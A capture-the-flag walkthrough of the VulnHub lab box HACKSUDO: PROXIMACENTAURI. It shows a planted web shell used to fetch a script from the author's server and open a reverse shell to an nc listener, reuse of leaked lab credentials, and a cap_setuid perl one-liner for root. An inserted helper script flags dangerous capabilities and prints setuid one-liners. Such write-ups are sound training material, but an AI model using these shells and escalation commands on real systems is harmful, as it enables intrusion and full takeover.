Vulnhub: HACKSUDO: PROXIMACENTAURI
HACKSUDO: PROXIMACENTAURI
This is HACKSUDO: PROXIMACENTAURI from VulnHub.
Box created by hacksudo team members Vishal Waghmare and Soham Deshmukh. This box should be easy to medium. This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh) and Website (https://hacksudo.com)
Let’s go.
Ports
HTTP only. Well, I guess we won't waste much time here, eh?
HTTP
┌──(root💀kali)-[/opt/vulnhub/proxmicenturi]
└─# feroxbuster -u http://192.168.1.242 -w /usr/share/seclists/Discovery/Web-Content/common.txt
This gets quite a few hits, but the interesting one is a directory listing at http://192.168.1.242/data/trash/files/:
[PARENTDIR] Parent Directory -
[ ] shell.phar 2021-06-04 23:43 17K
Wait, what?
http://192.168.1.242/data/trash/files/shell.phar
Yep, the box has a web shell sitting on it for us. A .phar file is a PHP archive, and Debian's stock Apache/mod_php configuration hands .phar to the PHP handler just like .php, so requesting it runs whatever is inside. I use it to pull a shell script of my own onto the box (the GET /shell.sh in the updog log below) and get a reverse shell. Erm, yeah.
┌──(root💀kali)-[/opt/vulnhub/proxmicenturi]
└─# updog
[+] Serving /opt/vulnhub/proxmicenturi...
* Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)
192.168.1.242 - - [18/Jun/2021 07:49:49] "GET /shell.sh HTTP/1.1" 200 -
^C
[!] Exiting!
┌──(root💀kali)-[/opt/vulnhub/proxmicenturi]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.242] 38168
bash: cannot set terminal process group (542): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ProximaCentauri:/dev/shm$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@ProximaCentauri:/dev/shm$ sudo -l
bash: sudo: command not found
The rest is just enumeration.
Proxima
www-data@ProximaCentauri:/usr/lib/systemd/system$ file /var/backups/mysql.bak
/var/backups/mysql.bak: PHP script, ASCII text
www-data@ProximaCentauri:/usr/lib/systemd/system$ cat /var/backups/mysql.bak
<?php
/**
* The base configuration for WordPress
# snip
There's no WordPress on this box, but the backup still holds database creds:
/** MySQL database username */
define( 'DB_USER', 'alfauser' );
/** MySQL database password */
define( 'DB_PASSWORD', 'passw0rd' );
Better try it:
www-data@ProximaCentauri:/usr/lib/systemd/system$ mysql -u alfauser -p
Enter password: passw0rd
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 39
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| proximacentauri |
+--------------------+
4 rows in set (0.003 sec)
MariaDB [(none)]> use proximacentauri
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [proximacentauri]> show tables;
+---------------------------+
| Tables_in_proximacentauri |
+---------------------------+
| authors |
+---------------------------+
1 row in set (0.000 sec)
MariaDB [proximacentauri]> select * from authors;
+------+---------+-----------------+---------------------+
| id | name | password | email |
+------+---------+-----------------+---------------------+
| 1 | proxima | alfacentauri123 | [email protected] |
+------+---------+-----------------+---------------------+
1 row in set (0.000 sec)
MariaDB [proximacentauri]> quit
Bye
Does the password from the database also work for the local proxima account?
www-data@ProximaCentauri:/usr/lib/systemd/system$ su proxima
Password: alfacentauri123
proxima@ProximaCentauri:/usr/lib/systemd/system$ sudo -l
bash: sudo: command not found
LinPEAS gives us this:
Files with capabilities (limited to 50):
/home/proxima/proximaCentauriA/perl = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
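Triage of a capability listing like the one above, as an added example that is not code from the original write-up or from LinPEAS itself. It filters `getcap -r /` output down to the capabilities that actually hand over root, ignores the harmless `cap_net_raw` on ping, and prints the matching one-liner for the hits. `SAMPLE_GETCAP` is constructed: its first two lines mirror the listing above, the python3.7 and tar lines are made up to show the filtering and were not on the box.

```shell
#!/bin/sh
# Added example, not code from the original write-up: triage a getcap -r /
# listing the way LinPEAS' "Files with capabilities" check does, and print
# the matching one-liner for the hits. SAMPLE_GETCAP is constructed; only
# the perl and ping lines come from the box.

# Capabilities that on their own let an unprivileged user become root or
# read any file. cap_net_raw (ping) is deliberately absent: raw sockets
# are not a privilege escalation.
DANGEROUS_CAPS='cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner'

SAMPLE_GETCAP='/home/proxima/proximaCentauriA/perl = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.7 = cap_setuid+i
/usr/bin/tar cap_dac_read_search=ep'

# Read getcap lines on stdin ("path = caps" or the newer "path caps") and
# print "path caps" for each file carrying a dangerous capability in its
# Effective set. Inheritable-only (+i) entries are skipped: they only
# matter if a parent process passes the capability down.
flag_dangerous_caps() {
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    case $line in
      *' = '*) path=${line%% = *}; caps=${line#* = } ;;
      *)       path=${line%% *};   caps=${line#* } ;;
    esac
    names=${caps%%[+=]*}        # e.g. cap_setuid,cap_setgid
    flags=${caps##*[+=]}        # e.g. ep
    case $flags in *e*) ;; *) continue ;; esac
    for c in $DANGEROUS_CAPS; do
      case ",$names," in
        *",$c,"*) printf '%s %s\n' "$path" "$caps"; break ;;
      esac
    done
  done
}

# For a cap_setuid binary, the one-liner that becomes root. setuid() only
# changes the uid, which is why the write-up's id output shows gid=1001(proxima).
exploit_hint() {
  # $1 = path of the capable binary
  case ${1##*/} in
    perl*)   printf "%s -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\";'\n" "$1" ;;
    python*) printf "%s -c 'import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\")'\n" "$1" ;;
    *)       printf '# no canned one-liner for %s, check GTFOBins\n' "$1" ;;
  esac
}

# Run the triage over the constructed sample. On a real box replace the
# sample with: getcap -r / 2>/dev/null | flag_dangerous_caps
triage_sample() {
  printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous_caps
}

triage_sample | while read -r path caps; do
  printf '%s (%s)\n' "$path" "$caps"
  exploit_hint "$path"
done
```

The filter keys on the Effective flag on purpose: a binary with `cap_setuid+p` only would still need to raise the capability itself before `setuid(0)` succeeds, which a stock interpreter never does.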
cap_setuid+ep on a perl interpreter means it can call setuid(0) without being root (only the uid changes, so the gid stays proxima, as the id output shows). And we use it:
proxima@ProximaCentauri:~/proximaCentauriA$ ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id;hostname;date
uid=0(root) gid=1001(proxima) groups=1001(proxima)
ProximaCentauri
Fri 18 Jun 2021 08:35:00 AM EDT
# cat /root/root.txt
proxima centauri ----->
,:
,' |
/ :
--' /
\/ /:/
/ ://_\
__/ /
)'-. /
./ :\
/.' '
'/'
+
'
`.
.-"-
( |
. .-' '.
( (. )8:
.' / (_ )
_. :(. )8P `
. ( `-' ( `. .
. : ( .a8a)
/_`( "a `a. )"'
( (/ . ' )=='
( ( ) .8" +
(`'8a.( _( (
..-. `8P ) ` ) +
-' ( -ab: )
' _ ` (8P"Ya
_( ( )b -`. ) +
( 8) ( _.aP" _a \( \ *
+ )/ (8P (88 ) )
(a:f " `"`
you rooted this server
root flag{e2798af12a7a0f4f70b4d69efbc25f4d}
#
And it’s bedtime.